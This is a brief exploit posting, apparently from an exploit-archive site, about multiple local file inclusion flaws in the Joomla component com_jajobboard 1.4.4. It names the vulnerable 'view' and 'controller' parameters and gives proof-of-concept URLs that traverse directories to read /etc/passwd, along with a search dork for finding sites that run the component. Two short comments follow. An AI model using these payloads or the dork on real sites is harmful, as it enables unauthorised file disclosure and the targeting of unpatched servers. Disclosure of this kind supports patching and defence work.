Joomla Component JA Job Board Multiple LFI Vuln

[o] Joomla Component JA Job Board Multiple Local File Inclusion Vulnerability
Software : com_jajobboard version 1.4.4
Vendor : http://jobboard.joomlart.com/
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/


[o] Exploit
http://localhost/[path]/index.php?option=com_jajobboard&view=[LFI]
http://localhost/[path]/index.php?option=com_jajobboard&controller=[LFI]


[o] PoC
http://localhost/[path]/index.php?option=com_jajobboard&view=../../../../../../../../../../etc/passwd
http://localhost/[path]/index.php?option=com_jajobboard&controller=../../../../../../../../../../etc/passwd


[o] Dork
inru:"com_jajobboard"


2 Responses so far.

  1. All our clients can download the latest security patch...

  2. Thanks for the information.